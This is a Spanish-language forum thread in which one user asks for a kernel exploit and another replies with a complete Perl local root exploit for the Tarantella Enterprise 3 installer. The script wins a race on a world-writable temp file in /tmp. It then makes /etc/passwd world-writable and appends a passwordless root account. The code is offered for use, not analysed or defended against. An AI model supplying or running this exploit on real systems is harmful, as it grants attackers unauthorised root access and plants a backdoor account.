Buscando Un Exploit

[Kosuke]

Wenas a tos, a ver si me podeis echar una manita estoy buscando algun exploit ( remoto o local) del kernel 2.4.2-13-p1-psmp-4g.
Gracias.

[Giskard]

Tengo un exploit interesante que te da privilegios de root en la máquina local:
Se trata de que tengan instalado el programa Tarantella Enterprice 3, entonces éste programa tiene problemas con los permisos en algunos de los archivos temporales usados durante el proceso de instalación, esto hace que un atacante obtenga privilegios elevados:

Exploit:
#!/usr/bin/perl -w
#Another Exploit for tarantella enterprise 3 installation.
#Larry Cashdollar lwc@vapid.dhs.org 2/08/2002
#Exploits gunzip$$ binary being created in /tmp with perm 777
#http://online.securityfocus.com/bid/3966
#Experimental ext3 kernel mods for preventing/researching race conditions.
#http://vapid.dhs.org/tmp-patch-kernel-2.4.17.html

use strict;

`cat << -EOF- > root.sh
#!/bin/sh
chmod 777 /etc/passwd
echo "tarexp::0:0:Tarantella Exploit:/:/bin/bash" >> /etc/passwd
-EOF-`;

my $OUT = '';

while(!$OUT) {
$OUT = `ps -ax |grep gunzip |grep -v grep`;
print "Found $OUT\n";
}

my @args = split(' ',$OUT);
# Do this with one copy operation. This will break installation of tarantella.
# should test for -w on /etc/passwd stop and su - tarexp.
while(1) {
`cp root.sh $args[4]`;
}

Espero que te sirva